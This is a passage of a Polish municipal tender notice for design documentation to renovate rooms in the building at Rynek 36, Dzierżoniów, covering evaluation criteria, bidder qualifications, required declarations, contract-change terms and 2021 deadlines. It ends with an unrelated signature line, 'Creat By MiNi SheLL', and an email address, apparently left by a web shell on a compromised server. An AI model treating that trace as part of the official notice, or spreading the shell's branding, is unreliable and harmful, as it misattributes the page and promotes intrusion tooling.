class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą zostanie uznana oferta Wykonawcy, który spełni<br/>wszystkie postawione w SWZ warunki, nie podlega wykluczeniu z postępowania, złoży ofertę<br/>niepodlegającą odrzuceniu oraz uzyska łącznie największą liczbę punktów stanowiących sumę<br/>punktów przyznanych w ramach każdego z podanych kryteriów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie projektanta w specjalności architektonicznej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 ustawy Pzp Zamawiający określa następujące warunki udziału w<br/>postępowaniu dotyczące zdolności technicznej lub zawodowej:<br/>w zakresie kwalifikacji zawodowych:<br/>Warunek zostanie spełniony, jeżeli Wykonawca samodzielnie lub Wykonawcy występujący<br/>wspólnie, lub przy udziale podmiotu, na którego zdolnościach technicznych lub zawodowych<br/>polega Wykonawca wykaże, że dysponuje co najmniej:<br/>- jedną osobą posiadającą uprawnienia do projektowania w specjalności architektonicznej,<br/>- jedną osobą posiadającą uprawnienia do projektowania w specjalności,<br/>instalacyjnej w zakresie instalacji i urządzeń elektrycznych i elektroenergetycznych,<br/>- jedną osobą posiadającą uprawnienia do projektowania w specjalności<br/>instalacyjnej w zakresie instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i<br/>kanalizacyjnych,<br/>- jedną osobą posiadającą uprawnienia do projektowania w specjalności instalacyjnej w zakresie<br/>instalacji i urządzeń telekomunikacyjnych.<br/>Potencjał techniczny można łączyć w ramach jednej osoby.<br/>Za uprawnienia budowlane odpowiadające wyżej określonym uznane zostaną uprawnienia,<br/>które wydane zostały na podstawie wcześniej obowiązujących przepisów prawnych oraz<br/>odpowiadające im uprawnienia wydane obywatelom państw członkowskich Unii Europejskiej,Konfederacji Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia o Wolnym<br/>Handlu – EFTA (strony umowy o Europejskim Obszarze Gospodarczym) z zastrzeżeniem, art.<br/>12 a oraz innych przepisów ustawy Prawo Budowlane (t.j. Dz. U. z 2020 r., poz. 1333 z późn.<br/>zm.) oraz ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych<br/>nabytych w państwach członkowskich Unii Europejskiej (t.j. Dz. U. z 2020 r., poz. 220 z późn.<br/>zm.).<br/>3. Ocena spełniania w/w warunków udziału w postępowaniu zostanie dokonana metodą<br/>spełnia/nie spełnia.<br/>4. Oceniając zdolność techniczną lub zawodową Zamawiający może, na każdym etapie<br/>postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie<br/>przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów<br/>technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy<br/>może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie wykonawcy brak podstaw do wykluczenia z postępowania na podstawie przesłanek<br/>określonych w art. 108 ust. 1 ustawy Pzp (wzór stanowi załącznik nr 2 do SWZ). W przypadku<br/>podmiotów występujących wspólnie oświadczenie składa każdy wykonawca. W przypadku polegania<br/>na zdolnościach lub sytuacji podmiotów udostępniających zasoby, Wykonawca wraz z oświadczeniem,<br/>o którym mowa powyżej, składa także oświadczenie podmiotu udostępniającego zasoby, potwierdzające<br/>brak podstaw wykluczenia tego podmiotu. Oświadczenie wykonawcy potwierdzające spełnienie<br/>warunków udziału w postępowaniu, określone w w rozdziale II podrozdziale 7 SWZ (wzór stanowi<br/>załącznik nr 3 do SWZ). W przypadku podmiotów występujących wspólnie oświadczenie składa każdy<br/>z wykonawców, w zakresie w jakim wykazuje spełnienie warunków udziału w postępowaniu. W<br/>przypadku polegania na<br/>zdolnościach podmiotów udostępniających zasoby, Wykonawca składa także oświadczenie podmiotu<br/>udostępniającego zasoby, potwierdzające spełnianie warunków udziału w postępowaniu, w zakresie, w<br/>jakim wykonawca powołuje się na jego zasoby. Oświadczenie wykonawcy dotyczące podstaw<br/>wykluczenia wymienionych w art. 108 ust. 1 pkt 1, 2 i 5 ustawy Pzp wraz z informacją o podjętych<br/>środkach naprawczych.<br/>(wzór stanowi załącznik nr 4 do SWZ). W przypadku podmiotów występujących wspólnie oświadczenie<br/>składa każdy wykonawca. W przypadku<br/>gdy Wykonawca polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa,<br/>wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji<br/>niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek<br/>dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi<br/>zasobami tych podmiotów (wzór stanowi załącznik nr 6 do SWZ). Zobowiązanie podmiotu<br/>udostępniającego zasoby, o którym mowa powyżej, musi potwierdzać, że stosunek łączący wykonawcę<br/>z podmiotami udostępniającymi zasoby, gwarantuje rzeczywisty dostęp do tych zasobów oraz określać<br/>w szczególności: zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby; sposób<br/>i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te<br/>zasoby przy wykonywaniu zamówienia; czy i w jakim zakresie podmiot udostępniający zasoby, na<br/>zdolnościach którego wykonawca polega w odniesieniu do warunków udziału w postępowaniu<br/>dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje usługi, których<br/>wskazane zdolności dotyczą. Oświadczenie wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia składane na podstawie art. 117 ust. 4 ustawy z dnia 11 września 2019 r. Prawo zamówień<br/>publicznych (Dz. U. z 2019 r., poz. 2019 z późn. zm.) - (wzór stanowi załącznik nr 7 do SWZ) należy<br/>złożyć w formie elektronicznej (tj. w postaci elektronicznej opatrzonej kwalifikowanym podpisem<br/>elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym<br/>przez osobę upoważnioną do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia. Pełnomocnictwo (o ile dotyczy). Potwierdzenie aktualności informacji zawartych w<br/>oświadczeniu, o którym mowa w rozdziale II podrozdziale 9 pkt. 1 lit. b SWZ w zakresie podstaw<br/>wykluczenia z postępowania wskazanych przez Zamawiającego (wzór stanowi załącznik nr 8 do SWZ).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy Pzp, Zamawiający przed wyborem<br/>najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących<br/>podmiotowych środków dowodowych:<br/>a) wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za projektowanie, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnego do wykonania zamówienia<br/>publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do<br/>dysponowania tymi osobami – załącznik nr 9 do SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Aktualne na dzień złożenia oświadczenia o niepodleganiu wykluczeniu (załącznik nr 2 do<br/>SWZ) oraz spełnianiu warunków udziału w postępowaniu (załącznik nr 3 do SWZ) w zakresie<br/>wskazanym w rozdziale II podrozdziałach 7 i 8 SWZ –- każdy osobno spośród Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia (dotyczy również wspólników spółki cywilnej)<br/>i podmiot trzeci, na którego potencjał powołuje się Wykonawca celem potwierdzenia spełnienia<br/>warunków udziału w postępowaniu. Oferta oraz oświadczenie o niepodleganiu wykluczeniu oraz<br/>spełnianiu warunków udziału w postępowaniu muszą być złożone w oryginale. To samo dotyczy<br/>oświadczenia Wykonawcy o tym, że zachodzą wobec niego podstawy wykluczenia z<br/>postępowania na podstawie art. 108 ust. 1 pkt. 1, 2 ,5 ustawy Pzp (załącznik nr 4 – o ile<br/>dotyczy).<br/>2. Gdy umocowanie osoby składającej ofertę nie wynika z dokumentów rejestrowych,<br/>Wykonawca, który składa ofertę za<br/>pośrednictwem pełnomocnika, powinien dołączyć do oferty dokument pełnomocnictwa<br/>obejmujący swym zakresem umocowanie do złożenia oferty lub do złożenia oferty i podpisania<br/>umowy. W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia<br/>Wykonawcy zobowiązani są do ustanowienia pełnomocnika. Pełnomocnictwo do złożenia oferty<br/>musi być złożone w oryginale w takiej samej formie, jak składana jest oferta (tj. w formie<br/>elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej<br/>opatrzonej podpisem zaufanym, lub podpisem osobistym). Dopuszcza się także złożenie<br/>elektronicznej kopii (skanu) pełnomocnictwa sporządzonego uprzednio w formie pisemnej, w<br/>formie elektronicznego poświadczenia sporządzonego stosownie do art. 97 par 2 ustawy z<br/>dnia14 lutego 1991 r. – Prawo o notariacie, które to poświadczenie notariusz opatruje<br/>kwalifikowanym podpisem elektronicznym, bądź też poprzez opatrzenie skanu pełnomocnictwa<br/>sporządzonego uprzednio w formie pisemnej kwalifikowanym podpisem, podpisem zaufanym<br/>lub podpisem osobistym mocodawcy. Elektroniczna kopia pełnomocnictwa nie może być<br/>uwierzytelniona przez upełnomocnionego. 3. Oświadczenie Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia – załącznik nr 7 do SWZ. 4. Zobowiązanie podmiotu<br/>trzeciego – załącznik nr 6 do SWZ (o ile dotyczy). Zobowiązanie musi być złożone w formie<br/>elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci<br/>elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym osoby upoważnionej do<br/>reprezentowania Wykonawców zgodnie z formą reprezentacji określoną w dokumencie<br/>rejestrowym właściwym dla formy organizacyjnej lub innym dokumencie. 5. W przypadku gdy<br/>Wykonawca powierza wykonanie części zamówienia podwykonawcy, zobowiązany jest do<br/>wykazania w załączniku nr 5 do SWZ informacji o części zamówienia, której wykonanie<br/>zamierza powierzyć podwykonawcom oraz podania nazw ich firm, o ile są już znane.<br/>6. Zastrzeżenie tajemnicy przedsiębiorstwa – W przypadku informacji objętych tajemnicą<br/>przedsiębiorstwa Wykonawca powinien w momencie ich przekazania wyraźnie oznaczyć, które<br/>informacje stanowią tajemnicę przedsiębiorstwa oraz nie powinny być udostępniane. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> a) Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do<br/>reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia<br/>umowy w sprawie przedmiotowego zamówienia publicznego; b) Wszelka korespondencja<br/>będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem; c) Do oferty należy<br/>załączyć<br/>pełnomocnictwo dla ustanowionego pełnomocnika; d) Wykonawcy składają jedną ofertę, do<br/>której załączone będą dokumenty, o których mowa w SWZ; e) Wykonawca winien przedłożyć<br/>dokumenty i oświadczenia wymienione w rozdziale II podrozdziale 9 SWZ dotyczące każdego<br/>partnera konsorcjum osobno w zakresie tam wskazanym ; f) Oświadczenia i dokumenty<br/>wspólne, takie jak np.: oferta cenowa, składa pełnomocnik Wykonawców w imieniu wszystkich;<br/>g) Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich<br/>Wykonawców występujących wspólnie; h) wszyscy partnerzy będą ponosić odpowiedzialność<br/>solidarną za wykonanie umowy zgodnie z jej postanowieniami; i) Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców,<br/>którzy wykonają usługi, do realizacji których te zdolności są wymagane. Wtedy powinni dołączyć<br/>do oferty oświadczenie (załącznik nr 7 do SWZ), z którego wynika, które usługi wykonują<br/>poszczególni Wykonawcy, j) przed podpisaniem umowy Wykonawcy składający ofertę wspólną<br/>będą mieli obowiązek przedstawić Zamawiającemu umowę konsorcjum. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w<br/>stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy w okolicznościach:<br/>a)Zamawiający dopuszcza możliwość zmiany terminu wykonania przedmiotu umowy<br/>w następujących przypadkach: 1) zmiany obowiązujących przepisów prawa wpływających na<br/>termin i sposób wykonania przedmiotu Umowy, w tym w szczególności wynikających ze<br/>zmian Ustawy z dnia 2 marca 2020 r. o szczególnych rozwiązaniach związanych z<br/>zapobieganiem,przeciwdziałaniem i zwalczaniem COVID – 19, innych chorób zakaźnych oraz<br/>wywołanych nimi sytuacji kryzysowych (t.j. Dz. U. z 2020 r., poz. 1842), 2) przedłużenia przez<br/>władze państwowe stanu epidemii lub dokonania zmiany tego stanu na inny stan wyjątkowy,<br/>ograniczający normalny sposób funkcjonowania państwa.Strona w należycie uzasadnionym<br/>wniosku o zmianę terminu wykonania przedmiotu umowy jest obowiązana do wskazania w<br/>szczególności: 1)propozycji terminu wykonania przedmiotu umowy, 2) faktów uzasadniających<br/>proponowaną zmianę, 3) podstawy prawnej wnioskowanej zmiany wynikającej z obowiązujących<br/>przepisów prawa lub z umowy, 4) dowodów na poparcie faktów, że wykonanie umowy w<br/>terminie wskazanym w umowie jest niemożliwe z przyczyn, o których mowa w pkt. a.b)<br/>Przewiduje się możliwość zmiany terminu wykonania przedmiotu umowy z powodu przedłużającego się terminu uzyskania przez Wykonawcę uzgodnień, opinii, decyzji i<br/>zatwierdzeń a także odstępstwa od warunków techniczno-budowlanych do dokumentacji<br/>projektowej, mających wpływ na jej wykonanie, od instytucji opiniujących projekt. Wystąpienie<br/>tych okoliczności i ich udokumentowanie przez Wykonawcę umożliwi wydłużenie terminu<br/>realizacji zamówienia.Termin będzie wydłużony o czas wskazany przez Zamawiającego. c)<br/>Dopuszcza się zmiany umowy w przypadkach przewidzianych w art. 455 ust. 1 pkt 3, 4 oraz ust.<br/>2 ustawy Pzp. d)Każda ze Stron ma prawo do zawnioskowania o zmianę terminu wykonania<br/>przedmiotu umowy.Wniosek pod rygorem nieważności wymaga zachowania formy pisemnej z<br/>podaniem terminu wykonania przedmiotu umowy i należytym uzasadnieniem przyczyn<br/>proponowanej zmiany.Wniosek winien być złożony w terminie 7 dni od dnia wystąpienia<br/>okoliczności uzasadniających proponowaną zmianę.Powyższe postanowienie stanowi katalog<br/>zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do<br/>wyrażenia takiej zgody.Wymienione powyższe możliwości wprowadzenia zmian są<br/>uprawnieniem a nie obowiązkiem Zamawiającego. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-10-05 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Za pośrednictwem Platformy Zakupowej https://dzierzoniow.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-10-05 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-11-03</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wykonawcy oraz innemu podmiotowi, jeżeli ma lub miał interes w uzyskaniu zamówienia oraz<br/>poniósł lub może ponieść szkodę w wyniku naruszenia przez Zamawiającego przepisów ustawy<br/>Pzp, przysługują środki ochrony prawnej określone w dziale IX ustawy Pzp. Pełna nazwa<br/>zamówienia:Wykonanie dokumentacji projektowej i specyfikacji technicznych wykonania, i<br/>odbioru robót budowlanych dla remontu pomieszczeń zlokalizowanych na II kondygnacji (pow.<br/>ok. 316m2) oraz na I kondygnacji (pow. ok. 130m2) w budynku nr 36 przy ul. Rynek w<br/>Dzierżoniowie, w ramach realizacji zadania inwestycyjnego pn. „Remont pomieszczeń w<br/>budynku Rynek 36”. Płatność za wykonanie przedmiotu zamówienia realizowana będzie w roku 2022, w związku z tym odbiór przedmiotu zamówienia Zamawiający przewiduje w roku 2022.

Creat By MiNi SheLL
Email: jattceo@gmail.com